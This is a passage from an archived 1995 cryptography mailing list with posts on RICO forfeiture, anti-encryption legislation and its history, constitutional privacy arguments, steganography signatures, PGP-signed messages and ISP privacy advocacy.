subject to RICO. My guess is that the intent is that >from one placement on an FTP server or one posting to a newsgroup, the >perpetrator of that heinous act will have passed his RICO qualification and >therefore be subject to having all he owns taken from him. RICO question: i thought that the idea of RICO is to confiscate assets of racketeers that are derived from criminal activities. PGP and remailer software is distributed free. so would RICO seizures even apply (yes I know this doesnt' always stop the FBI)? -- Thank you VERY much! You'll be getting a Handsome Simulfax Copy of your OWN words in the mail soon (and My Reply). PGP Print: 0529 C9AF 613E 9E49 378E 54CD E232 DF96 Thank you for question, exit left to Funway. From jya at pipeline.com Sun Jul 16 06:24:19 1995 From: jya at pipeline.com (John Young) Date: Sun, 16 Jul 95 06:24:19 PDT Subject: FAM_15\" Message-ID: <199507161324.JAA26100@pipe1.nyc.pipeline.com> 7-16-95. NYPaper: "New Concerns Raised Over a Computer Smut Study. 'They wanted to be famous.' It worked." Growing controversy over a widely publicized study of on-line computer pornography, conducted by a researcher at Carnegie Mellon University, has prompted the university to investigate whether the research violated ethical or academic guidelines. The investigation follows the disclosure by angry faculty members that an undergraduate student and his principal faculty adviser at Carnegie Mellon spied on the private computer habits of nearly 3,000 students, staff members and other faculty members last year as part of the research study into pornography viewing habits. KEY_hol "Documents Were Destroyed as F.B.I. Resisted Seige Investigation. Hints of a cover-up: more embarrassment over a fatal confrontation." A Justice Department report not yet made public on the F.B.I.'s standoff with a white separatist in Idaho shows that in late 1992 and early 1993 F.B.I. managers were frantically trying to block Federal prosecutors from obtaining the Bureau's records on the case. Justice Department investigators, who uncovered the document destruction, have found that a career F.B.I. official stripped the files of official records that would have clearly shown if top F.B.I. officials in Washington were in command of the operation. FOL_hah Siamese: FAM_15" From rsnyder at janet.advsys.com Sun Jul 16 08:31:04 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Sun, 16 Jul 95 08:31:04 PDT Subject: PGP-integrated mail readers (was Re: Deployment) In-Reply-To: Message-ID: <199507161531.LAA27343@janet.advsys.com> A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From jya at pipeline.com Sun Jul 16 08:58:06 1995 From: jya at pipeline.com (John Young) Date: Sun, 16 Jul 95 08:58:06 PDT Subject: G0D_dim Message-ID: <199507161558.LAA10839@pipe1.nyc.pipeline.com> 7-16-95. NYPaper: "The Spies' Code and How It Broke. The Russians had a problem: it's almost impossible to be perfectly random. The Russians suffered from a lapse in quality control. They inadvertently let some pattern find its way into their scrambled codes, a loose thread that allowed American code breakers to unravel the scheme. "Given a pure, perfect one-time system, you're not going to break it," said David Kahn, visiting historian at the N.S.A.'s Center for Cryptologic History. RAN_dum "Twilight of the Nukes. The post-war years were spent hoarding nuclear weapons. Now it's time to put them away." Since that first nuclear test the United States has built 70,000 nuclear weapons of almost every conceivable kind: warheads, artillery shells, land mines, depth charges and even backpack-style plutonium explosives weighing 58 pounds but equivalent to 10 tons of TNT. But now it is the twilight of the nukes. They are being taken apart by the United States and the Soviet Union at the rate of 10 or 12 a day, and the new problem is how to keep track them of all. TWI_god >1: G0D_dim From monty.harder at famend.com Sun Jul 16 09:04:04 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sun, 16 Jul 95 09:04:04 PDT Subject: Stego Standards Silly ? ( Message-ID: <8AD5238.000300015F.uuout@famend.com> LM> The standard answer to agent-in-the-middle tampering is of LM> course digital signatures. Now, the question is, will we be allowed to sign LM> our possibly-stego-enclosing GIFs with reasonable confidence that the govt. LM> can't forge our signatures ? Obviously the signature itself can't be LM> stegoed, or else we fall into an infinite regress. Not obvious at all. You encrypt and sign as usual, stego the resultant output, and perhaps include in the stego routines some kind of CRC or hash if you like. But the point is that the signature still works to indicate whether the message was tampered with or not. If we posit a MITM, he can tamper with cyphertext =or= stegotext, but he can't defeat the signature. I would recieve a GIF which my stego software would turn into a file that PGP would puke on, telling me that Someone Is Messing With My Mail. I would not, of course, be able to reveal this fact directly. However, I could ask my correspondent to re-send the GIF, and when it comes out different in EVERY SINGLE LSB, I have proof of tampering. * Support legislation for a waiting period on taglines....... --- * Monster at FAmend.Com * From monty.harder at famend.com Sun Jul 16 09:04:09 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sun, 16 Jul 95 09:04:09 PDT Subject: DOJ Press Release, S. 974? Message-ID: <8AD5238.000300015B.uuout@famend.com> JY> According to the Computer Emergency Response Team at JY> Carnegie Mellon University, during the past four years, the JY> number of reported intrusions on the Internet has increased In the wake of the Rimm Job, any study from CMU is suspect. * Bad Borg, Bad Borg: Whatcha gon' do? Whatcha gon' do when they 'simlate you? --- * Monster at FAmend.Com * From monty.harder at famend.com Sun Jul 16 09:04:16 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sun, 16 Jul 95 09:04:16 PDT Subject: Root Causes Message-ID: <8AD5238.000300015C.uuout@famend.com> DK> It would seem that things such as the CDA, etc, are patent violations of the DK> Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such DK> measures be violating our civil rights, and thus be criminally liable? Congressional Immunity. DK> IANAL, of course, so I'll leave it up to those on the list who are to IANAL, either. But I have a thought, myself: [Please do not start an abortion flamefest on the list. If you want to argue it via Imail, I can handle that, but let's not bother the rest of the class, OK?] The Supremes found the right to have an abortion in some kind of "penumbral" right to privacy , which in turn came from Griswold v. Connecticut, if organic RAM serves. Given this precedent, may we challenge anti-crypto crap such as the Grassley Bill as a violation of the right to privacy? * Recursion: See "recursion". --- * Monster at FAmend.Com * From monty.harder at famend.com Sun Jul 16 09:04:20 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sun, 16 Jul 95 09:04:20 PDT Subject: Free The World Web Server project.. :) Message-ID: <8AD5238.000300015E.uuout@famend.com> DM> however, would be unobtrusive. A web page that mails a form letter to DM> _your_ congressperson's form-letter-readers (ie staff readers) would be DM> much better, IMHO. Expecially if the form letter generated would be randomly selected from parallel word streams. For example: Dear Senator <#SENATOR>: I am by the SB <#BILLNO> by Senator <#ORIGINATOR>..... You get the idea. Anyone who has read MAD Magazine could put such together. As an added bonus, use variable margin settings, and none of the letters would be exactly the same. Appropriate Imail => FAX software on a puter in DC (local call that way) with the phone number of the sender filled in on the top line for ID (izzat legal?) so it doesn't look like a form letter at all. The web page would generate a random letter, allow the user to edit it, further (possibly offering the alternate phrases) before he clicks on the [Send] button. * Len Buckholtz of Borg: LB> Quoting is irrelevant. --- * Monster at FAmend.Com * From hayden at krypton.mankato.msus.edu Sun Jul 16 09:24:54 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Sun, 16 Jul 95 09:24:54 PDT Subject: Ack! It's not my fault! Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Before anybody flames me too bad, I want to poitn out that I only posted the PineSign script ONCE. I don't know why it showed up multiple times. Most weird. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMAk9cDokqlyVGmCFAQFNaAQAvELOLo9wazD7Tfyl/fyg3Z4wLxdJCXSt +O61LYzqlzx45+Y7AG3KNiW3GgZFSnJkaUT+dfSpNs7p0M24ruTGYRxnPE0r0+Nk TrUkPCG4o3YR/azpxq/PzVp2TiOaRL3SyEaSHvNGrSj6nVGLYuosYckylzRpJp/S WkCcAUqlKg4= =zbEG -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From tcmay at sensemedia.net Sun Jul 16 09:35:05 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Sun, 16 Jul 95 09:35:05 PDT Subject: RICO and Asset Forfeitures Message-ID: At 12:59 PM 7/16/95, Andrew Spring wrote: >>ranked as a mobster subject to RICO. My guess is that the intent is that >>from one placement on an FTP server or one posting to a newsgroup, the >>perpetrator of that heinous act will have passed his RICO qualification and >>therefore be subject to having all he owns taken from him. > >RICO question: i thought that the idea of RICO is to confiscate assets of >racketeers that are derived from criminal activities. PGP and remailer >software is distributed free. so would RICO seizures even apply (yes I >know this doesnt' always stop the FBI)? As I understand RICO (Racketeer-Influenced and Corrupt Organizations Act, though the euphonious "Rico," a la South American drug kingpins, is the real reason for the name), only the assets imputed to the illegal act can be seized. Thus, boats, factories, houses, etc., that are imputed (believed, claimed) to have been bought partially or wholly from funds from illegal acts can be seized. Civil penalties are another matter. If you're charged with distributing something illegal and a fine of $250,000 is levied, then you may have to sell everything you own to pay it, but it's not a RICO seizure. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From lethin at ai.mit.edu Sun Jul 16 09:43:07 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Sun, 16 Jul 95 09:43:07 PDT Subject: ecm list Message-ID: <9507161642.AA20001@toast> It may be necessary to remove the ECM mailing list from the MIT computers (no big surprise here). The issue isn't the overwhelming traffic volume on the list; rather, the concern that it might violate some MIT regulation. If anyone wants to take it on, please contact me ASAP. Thanks, Rich From anonymous-remailer at shell.portal.com Sun Jul 16 10:22:36 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 16 Jul 95 10:22:36 PDT Subject: unix, vanguard Message-ID: <199507161720.KAA16734@jobe.shell.portal.com> >If you want to do something like Raph's remailer list, would you rather >implement it on a pc running windows or with a perl script on a unix >box? Not to prolong this argument, which hopefully won't turn into a lengthy OS debate, but this argument boils down to the "users vs. developers" situation. Sure, remailers and remailer lists are better implemented under unix, and there may be as many as what, 50 people (developers) in the world interested in doing this? On the other hand, several times that number of users will access the information and actually give it value; they (users) don't need unix at all. Maybe I'm a market share bigot, but to me, if you want to spread crypto to the masses, you have to do it with tools that run on the platforms the masses use. Who knows, perhaps in the future we'll see that the tools, programs, and front ends run on more popular operating systems, and the relatively fewer servers and scripts run on unix. -- Karl L. Barrus From bdavis at thepoint.net Sun Jul 16 10:31:39 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 16 Jul 95 10:31:39 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <9507142311.AA09635@tis.com> Message-ID: On Fri, 14 Jul 1995, Carl Ellison wrote: ... > Meanwhile, the Federal civil forfeiture fund goes to good things. The last > $9M (I believe it was) went to buying up AT&T DES phones to be made into > Clipper phones. Of course, the conversion hasn't happened yet and the DES > phones are sitting in a warehouse someplace -- but the $9M fund went to ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Nope. There is one right here in my office. And it makes me feel so safe and secure. Seriously, I have used it in secure mode once -- to test it. I'd be more likely to use my STU-III if I really want to be secure. > really good use, saving the world from AT&T DES. > > (sarcasm off) > > +--------------------------------------------------------------------------+ > |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme/home.html | > |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | > | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | > +----------------------------------------------------------- Jean Ellison -+ EBD From jgrubs at voxbox.norden1.com Sun Jul 16 11:10:45 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Sun, 16 Jul 95 11:10:45 PDT Subject: Fight, or Roll Over? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- "Perry E. Metzger" writes: > > What we can do, however, is to shape the culture of the net. That > > culture will have to eventually be listened to by DC. > > The beltway crowd doesn't log in. They ignored the petitions sent to > Leahy for S.314 because they didn't think of the people who sent the > petitions in as "real". I doubt they will understand the net for many > years to come, whereas we have to stall out the NSA and company now. We need to use e-mail/fax gateways that strip much of the e-mail headers. For some reason, fax has become so ubiquitous in U.S. businesses (including Congress) that it has become "mainstream" and creditable. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMAlVVt74r4kaz3mVAQFbRQP/dUY0tqbis9Up7sVDt6ydCpO93ZMhtSbd nUHtXd3+FCf7Phur7w8YMMY5I/VoMCpk9NLu7j9aeYMDtyWupj+Lj9d+wlFhuWHb bSRr7Y6xvqnbY1mHME0wgRx4FIDinudgG+n/XetaVlQHqQ68YrYsRcCmvt22j0eL ovPoF92ECyc= =k7LM -----END PGP SIGNATURE----- -- WebCasters(tm) James C. Grubs jgrubs at voxbox.norden1.com 6817 Maplewood Avenue Tel.: 419-885-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programing, Information brokering From liberty at gate.net Sun Jul 16 11:22:35 1995 From: liberty at gate.net (Jim Ray) Date: Sun, 16 Jul 95 11:22:35 PDT Subject: Root Causes Message-ID: <199507161819.OAA06090@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- PLEASE NOTE: IANAL either [yet] But, MONTY HARDER wrote: > [Please do not start an abortion flamefest on the list. If you want > to argue it via Imail, I can handle that, but let's not bother the > rest of the class, OK?] I agree, and this post has nothing to do with that controversy [I hope]. > > The Supremes found the right to have an abortion in some kind of >"penumbral" right to privacy , which in turn came from >Griswold v. Connecticut, if organic RAM serves. Given this precedent, >may we challenge anti-crypto crap such as the Grassley Bill as a >violation of the right to privacy? Good idea, but I have an idea to upset even *more* people. First of all, has anyone else noticed how the Republicans have placed life-and-death emphasis lately on the oft-ignored 10th Amendment. Amendment X -- "The powers not delegated to the United States by the Constitution, nor prohibited by it to the States, are reserved to the States respectively, or to the people." IMO, the Republicans will continue to do this as long as they can win the overwhelming majority of governorships, which is for the foreseeable future. Democrats, of course, don't like this and prefer unconstrained federal power [preferably in the hands of someone other than Newt, though]. There is, however, another Amendment which goes beyond being oft-ignored to the status of being truly forgotten, without ever having been repealed. Amendment IX -- "The enumeration in the Constitution of certain rights shall not be construed to deny or disparage others retained by the people." [The right to write code was among many rights NOT enumerated.] Republicans AND Democrats ALL HATE the 9th Amendment, which is the primary reason *I* like it so much. Various lawyers, judges, and [especially] law professors will sputter that the 9th is "impertinent!" or "irrelevant!" and should be ignored, and Jim Ray is just spouting off [again] about the slow erosion of freedom in this country. My rejoinder is "OK, if we're supposed to ignore it, why not just REPEAL it, after all, it's just sitting there doing nothing, cluttering up the rest of the Bill of Rights." Usually, conversation [and, I suspect, my eventual grade] degenerates at this point. Those C-punks not in law school, however, should keep the 9th in mind when talking about Constitutional issues on encryption rights, if for no other reason than to educate the public. In court, of course, I would concentrate on the 1st. Apologies to the various lurking law professors on the list, I am not talking about you. Also, this diatribe is mere academic speculation and not a legal opinion and IANAL and I have been known to be wrong in the past and I no-doubt will be wrong again in the future and most people in the legal profession think this is wrong so don't rely on it and your lawyer will think you are crazy if you say this to him (so don't) and so on and so on... JMR > > Regards, Jim Ray "It is dangerous to be right when the government is wrong." Voltaire - ------------------------------------------------------------------------ PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 - ------------------------------------------------------------------------ Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! email: zldf at clark.net or visit http://www.netresponse.com/zldf ________________________________________________________________________ - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMAlYGCoZzwIn1bdtAQFAvAF/U/0u/BjNThGjDeeOsv5CujcJcFBKf5Hx +SsUFAwYyD5I5DWosWA0iTZesc/DO3UR =bAZm -----END PGP SIGNATURE----- From banisar at epic.org Sun Jul 16 13:05:20 1995 From: banisar at epic.org (Dave Banisar) Date: Sun, 16 Jul 95 13:05:20 PDT Subject: A Chronology on crypto bans Message-ID: Someone asked why is there such a flurry recently on banning crypto in recent months. This is not a recent issue. There have been almost non-stop attempts for the last 15 years. I've been finishing up this chapter in the book Bruce Schneier and I are writing on crypto battles. Every so often a new FOIA document floats in from some request I made 3-4 years ago hat makes me have to revise it again. Here s a small chronology based on the chapter. ------ Attempts to ban encprytion 1977-1995 1977-1980 NSA Director Inman calls crypto born secret. Should be restricted. Attempts to use Invention Secrecy Act of 1951 to patent inventions by academic researchers. Attempts to use export control laws to limit scientific discussion. NSA Threates NSF over grants for crypto studies. 1981 American Council on Education committee recommends voluntary submissions of cryto papers to NSA 1984 National Security Decision Directive 145. Gave NSA authority over all govt crypto and computer security development. 1986 NSTISSP. Attempted to extend NSDD-145 to private sector. USe to justify visits to LEXIS/NEXIS, Dialog, public libraries etc. 1987 Congress passes Computer Security Act. Gives crypto authority to NIST. 1989 NIST signs MOU with NSA giving back authority to NSA. NIST starts development of new public key system to do both signatures and key exchange. 1990 After pressure by NSA. NIST adopts El Gamal for signatures only. NSA secreatly designs "algorithm on a chip" for key exchange. FBI, NSA and NIST also begin "National Cryptgraphic Review". 1991 FBI asks Senator Joseph Biden to introduce "Sense of Congress" to recommend backdoors in all encpryption, telephone systems. Provision removed after public outcry. Later evolves into digital telephony proposal. October 1991, NSA, FBI, CIA meet to discuss possible legislation on encryption. 1992 NIST memo - "FBI working on draft legislation to control and liscense all cryptography" 1993 Clipper Proposal introduced. Interagency working group formed by Presidential Review Directive 27. According to NSA memo on IWG "FBI proposed legislation to authorize the FCC to regulate common carriers, PBX operators, and manufacturers of encryption devices available for use in the US to ensure such systems and devices are compatable with law enforcement electronic surveillance interests....the interagency working group revied proposed legislation and concluded that ....legislation to authorize regulation of encryption product manufacturers would be considerably more difficult [than passing the digital telephone proposal] and required further study." 6 options were discussed including prohobiting all other encprytion besides Clipper. The other five have been classified "top secret". -------- Dave David Banisar (Banisar at epic.org) * 202-544-9240 (tel) Electronic Privacy Information Center * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * ftp/gopher/wais cpsr.org Washington, DC 20003 * HTTP://epic.digicash.com/epic From nesta at nesta.pr.mcs.net Sun Jul 16 13:27:18 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Sun, 16 Jul 95 13:27:18 PDT Subject: Unix not the Only Place for "Vanguard" Applications In-Reply-To: <199507152320.AA05094@tyrell.net> Message-ID: On Sat, 15 Jul 1995, Phil Fraering wrote: > Frankly, Unix fragmented into a bunch of pieces. Maybe it was because of > the USL-Novell-AT&T-Sun-Unix International-etc. battles (I don't even > recollect who was who in this battle). Maybe it was the News vs. X vs. > OpenLook vs. NeXTStep vs. etc. user interface battles. > > Well, it looks like there will be a major Unix mainstream again > with two branches capable of more-or-less running each other's > binaries without too much pain: FreeBSD and Linux. > My sentiments in a way, you'll see some higher end PC users moving to this, plus the usual gammut of teenage hackers, like I was. > In any case, I expect Windows (and Windows NT) will take an ever-increasing > share of the market for at least the next several years. I'm hardly alone > in this expectation. > > BTW, I hear Linux can now run Windows 3.1 in its DOS box. > not completely, it can load it and some apps if you run it like you used to have to on a 286. WINE is far from complete. The thing is some major software compnies are actually taking initiative and making lInux native apps, like Wordperfect is coming out in Fall, and Matlab and Mathematica are either here already, or will be here in a month or so. Alot fo commercial databases are coming to Linux too. BUT, please PLEASE, let's not let this turn into a advocacy war, I hang out on those groups myself and get enough of them there, don't need it here. I think we're all intelligent enough to realize that both platform bases have advantages and disadvantages. I personally get a woody form anything that flips bits so I'm not about to argue. "I regret that I have but six orifices to give you" -Nesta Stubbs /-/ a s t e http://www.mcs.net/~nesta/home.html Angeli Caduti Assasin From an250888 at anon.penet.fi Sun Jul 16 13:50:22 1995 From: an250888 at anon.penet.fi (an250888 at anon.penet.fi) Date: Sun, 16 Jul 95 13:50:22 PDT Subject: "Just write code" Message-ID: <9507162034.AA28228@anon.penet.fi> >Just write code. For whatever platform you like writing code for. And while you're at it, make it as platform-independent as possible. Porting to another platform or system involves writing code, no? ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From pcw at access.digex.net Sun Jul 16 15:19:36 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sun, 16 Jul 95 15:19:36 PDT Subject: Mods to Dining Cryptographers: legal questions... Message-ID: >I'm sorry if I was a little mysterious about my reference to >another use or mode of a DC-net; I'd _love_ to tell the rest of >you flat-out, and put the idea in the public domain, but I'm >not sure I _CAN_. > You should investigate an idea known as the provisional patent that is relatively new to the United States. They're supposedly shorter and designed to give you some claim to the ideas as well as some time to develop them enough to file a real patent. I can't give you any other advice except to tell you that my patent agent is also curious about them because they're new. -Peter From stevet at smeg.net4.io.org Sun Jul 16 16:34:36 1995 From: stevet at smeg.net4.io.org (Steve Thompson) Date: Sun, 16 Jul 95 16:34:36 PDT Subject: Crisis Overload (re Electronic Racketeering) In-Reply-To: Message-ID: Wish I could be more optimistic.... On Sat, 15 Jul 1995, Bolivar Shagnasty wrote: > Perry Metzger wrote: > > >"Robert A. Hayden" writes: > >> We've seen the enemy, that the are the 535 senators and representatives > >> in D.C., and the staff in the White House. It's time to shore up our > >> allies and enter the battle witht he best weapons we have; information > >> and popular use. [snippage] > Would it be more productive to hire the white shoes or start another few ISPs > and shepherd the new users to be privacy-aware letter writers and faxers? > Educate your ISPs. Any ISP that isn't political in this age is brain > dead and dead weight. Any ISP that sees its political interests as somehow > different than those of its users (recent lobbying to shift burdens away > from national services and onto users, and recent AOL admissions of > participation in what sounded like entrapping users) is worse than brain dead > -- it's part of the problem. Speaking for an ISP startup (unoficially :), we're planning to get a small startup going within the next few weeks. Being the technical brains behind the company (at least pertaining to the Internet), and having a strong idealistic streak, I assure you that I, for one, will be exerting as much effort as I can to promote cryptographic awareness for the users that subscribe. Besides running the MixMaster software, I am going to devote a local newsgroup to the topic and hold an ongoing tutorial/Q&A session on the uses of crypto software. I'll probably be posting some messages from this forum there as appropriate. I'd like to do something neat like offer mail-drop type accounts -- accessable via telnet/POP/IMAP -- for e$, perhaps. Being in Canada, I think I may have a little more time to get this sort of thing entrenched (on my system at least) than you do in the states, though I suspect that Uncle Sam may not even notice the border if they decide to get heavy-handed. Perhaps I'm dreaming. I am depressed at the direction the world is heading. The issue to me seems to be how bad the totalitarianism will get since I think it's already here. I'd really like to be able to move to another country... It might buy me ten to twenty years of breathing room before the United States encompasses the world. If anyone gets ahold of any tickets on a rocket off this planet, would they please give me a call? > Bolivar Regards, Steve Thompson, Internet Consultant at large -- stevet at smeg.net4.io.org ======================================================================= To the sane mind, even aggression against people is infinitely better than aggression against infinity. And it is the chief defect of sane society that it is boring. It is so boring that even sane people notice it. And so, from time to time, there is a war. This is intended to divert people's minds before they become so bored that they take to some impersonal kind of aggressive activity -- such as research, or asceticism, or inspiration, or something discreditable of that kind. From merriman at arn.net Sun Jul 16 17:13:25 1995 From: merriman at arn.net (David K. Merriman) Date: Sun, 16 Jul 95 17:13:25 PDT Subject: Free The World Web Server project.. :) Message-ID: <199507170016.TAA23019@arnet.arn.net> > Expecially if the form letter generated would be randomly selected >from parallel word streams. For example: > > Dear Senator <#SENATOR>: > > I am by the rights in|glaring First Amendment violations in|fascist mentality > of|ominous provisions of|potential for civil rights infringement > by> SB <#BILLNO> by Senator > <#ORIGINATOR>..... > > You get the idea. > > Anyone who has read MAD Magazine could put such together. As an added >bonus, use variable margin settings, and none of the letters would be >exactly the same. Appropriate Imail => FAX software on a puter in DC >(local call that way) with the phone number of the sender filled in on >the top line for ID (izzat legal?) so it doesn't look like a form letter >at all. > > The web page would generate a random letter, allow the user to edit >it, further (possibly offering the alternate phrases) before he clicks >on the [Send] button. > If someone in the DC area wants to set up such a system, I'll gladly donate an Intel SatisFAXion 200 fax/modem, complete with manuals, etc. This would be a Good Thing, IMHO. Dave Merriman This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! ------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From nobody at flame.alias.net Sun Jul 16 17:16:33 1995 From: nobody at flame.alias.net (Anonymous) Date: Sun, 16 Jul 95 17:16:33 PDT Subject: The Recent Flurry of Anit-Crypto Activity... Why? In-Reply-To: <3u6oj5$fir@nntp.crl.com> Message-ID: <199507170016.CAA19393@utopia.hacktic.nl> from 'Buzz White': > > More to the point, the question "Why Now?" comes to my mind. > > So, I posit that this legislative swirl is an attempt to squash true "crypto > for the masses" (via real commercial integration) before it gets out "into > the world". > > Anybody have a better analysis of the "Why Now" part of the question? Good theory, but I think the major reason is more obvious. We have elected "representatives", led by a complete slimeball president, that want to usurp every bit of liberty we have. Money, soul, healthcare, private property, you name it. The sooner they can grab it, the more completely they can control us. Crypto, digicash, and remailers work against their attempts, so they try to stop them. The more they want something from us, the stronger our effort must be not to let them have it. They think we need their "help" to live our lives, and that without we would be helpless. They think we're all like those pathetic people in LA who had no clue what to do with their welfare checks when check cashing stores were torched during the Rod-knee King Bar-B-Q and Block Party. The sad part is that as more and more people are absorbed into the welfare state, fewer remain to assert our right to personal liberty and our right "to be left alone". We're likely to lose by attrition. From dshayer at netcom.com Sun Jul 16 17:22:43 1995 From: dshayer at netcom.com (dshayer at netcom.com) Date: Sun, 16 Jul 95 17:22:43 PDT Subject: Esther Dyson in NYT Message-ID: Todays (sunday 7-16-95) NYT Magazine has an excellent (IMHO) article by Esther Dyson on why the government should not regulate the net. Its not written for techies like us, its written for normal non-wired people, like our parents and our senators. The article is clear, easy to follow, makes it points well, and refrains from overused analogies about highways and roadkill. So next time you're at a loss for words arguing with some clueless offline luser about why porn and pedophiles really aren't rampant all over the net, show them this article. David +------------------------------------------------------------------------+ |David Shayer dshayer at netcom.com | |Sentient Software / Symantec | |"Spam is not a verb." | +------------------------------------------------------------------------+ From monty.harder at famend.com Sun Jul 16 17:37:45 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sun, 16 Jul 95 17:37:45 PDT Subject: Mods to Dining Cryptographers: legal questions... Message-ID: <8AD5422.000300016A.uuout@famend.com> PF> spend on software patents. I don't, and don't mean to say that _he_ PF> goes around stealing ideas from other people and patenting them.) PF> PF> How do I do this and protect myself from the people who do have the PF> money to go through the intellectual property courthouse game? IANAL, but... Create a detatched signature certificate of your idea, and post =that= here. Get some of us to sign it I, _______, a resident of _______ County, __________, do hereby attest that I recieved the above certificate on _____ ___,1995. [plaintext for non-crypto-aware folks] and email to you. Also, make two hard copies, including hard copies of our notarizations you recieve back . Put one of them in an envelope with a 3.5" floppy of everything, and address the =back= to yourself. Go into the post office, and ask the clerk to hand-cancel the envelope, so that the cancellation goes half across the flap and the rest on the envelope. When you get this from yourself in the mail, you put it in your safety- deposit box or equivalent. This way, when you open the envelope in the presence of the Judge/Jury you have the word of the US Postal Service that you had X idea on Y date, not to mention the corroborrating e-signatures. If Z were to claim authorship, you could ask Z to prove it by forging your signature on another document. This could go a long way toward proving the value of PGP signature to the Unwashed Masses, =and= illustrate the danger of GACK + corrupt gummit agent (in the light of the Ruby Ridge and Waco hearings, people will be =quite= sensitive to the fact that agents can and do abuse their power). In fact, the ability for us to be able to attest to your possession of Document X on Date Y, without any of us ever seeing X itself, is one of the most powerful uses of digital signatures. I can see Phil Z. being called as an expert witness, to establish the mechanism involved. Joe Sixpack needs to hear Dan Blather mention this on the Evening News. OK, not Blather, but Koppel would do it. Maybe even John Stossel on 20/20. This is what we need to be pushing to the Luddite crowd: The very new technology that frightens them, because they percieve it as out of their control, brings with it new means for people to take control. Even if you lost your case on some other grounds, it would be one of the best PR bits for PGP I can think of. * Don't say "Gun Control", it's "Victim Disarmament". --- * Monster at FAmend.Com * From S0496872 at DOMINIC.BARRY.EDU Sun Jul 16 17:53:59 1995 From: S0496872 at DOMINIC.BARRY.EDU (ENRIQUE S. IGNARRA) Date: Sun, 16 Jul 95 17:53:59 PDT Subject: PGP FAQ Message-ID: <01HSY9PP2ZSI000DND@DOMINIC.BARRY.EDU> Could someone here politely send me some email on where i could get an updated PGP FAQ? I have an old one for v2.3a. I'd like to get an updated one. But where the old one says to go, the directory no longer exists. Thanks! Enrique s0496872 at dominic.barry.edu From jgrubs at voxbox.norden1.com Sun Jul 16 18:46:50 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Sun, 16 Jul 95 18:46:50 PDT Subject: Root Causes Message-ID: <751c9c1w165w@voxbox.norden1.com> -----BEGIN PGP SIGNED MESSAGE----- liberty at gate.net (Jim Ray) writes: > Amendment IX -- "The enumeration in the Constitution of certain rights > shall not be construed to deny or disparage others retained by the people." > > [The right to write code was among many rights NOT enumerated.] > Most importantly, it includes the right to decide what the other unenumerated rights are..... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMAm//N74r4kaz3mVAQHMJAP/RTmdhZc63J6XzL8FfKK6wk9RrXgcOZ4c kZHGqYzOo0ZJKbmsugOwEjerpGsbeIUu3SzM+vrVA+BaWHLaufELSmh7AQW4/FcY XyKv3Zu/JBBxEca+H0qbix/q433c+2r2iKJ1p8p1c8jgK/L+c66cJiTgWGMt2vPZ XBBMaYAOIUg= =DQyv -----END PGP SIGNATURE----- -- WebCasters(tm) James C. Grubs jgrubs at voxbox.norden1.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, 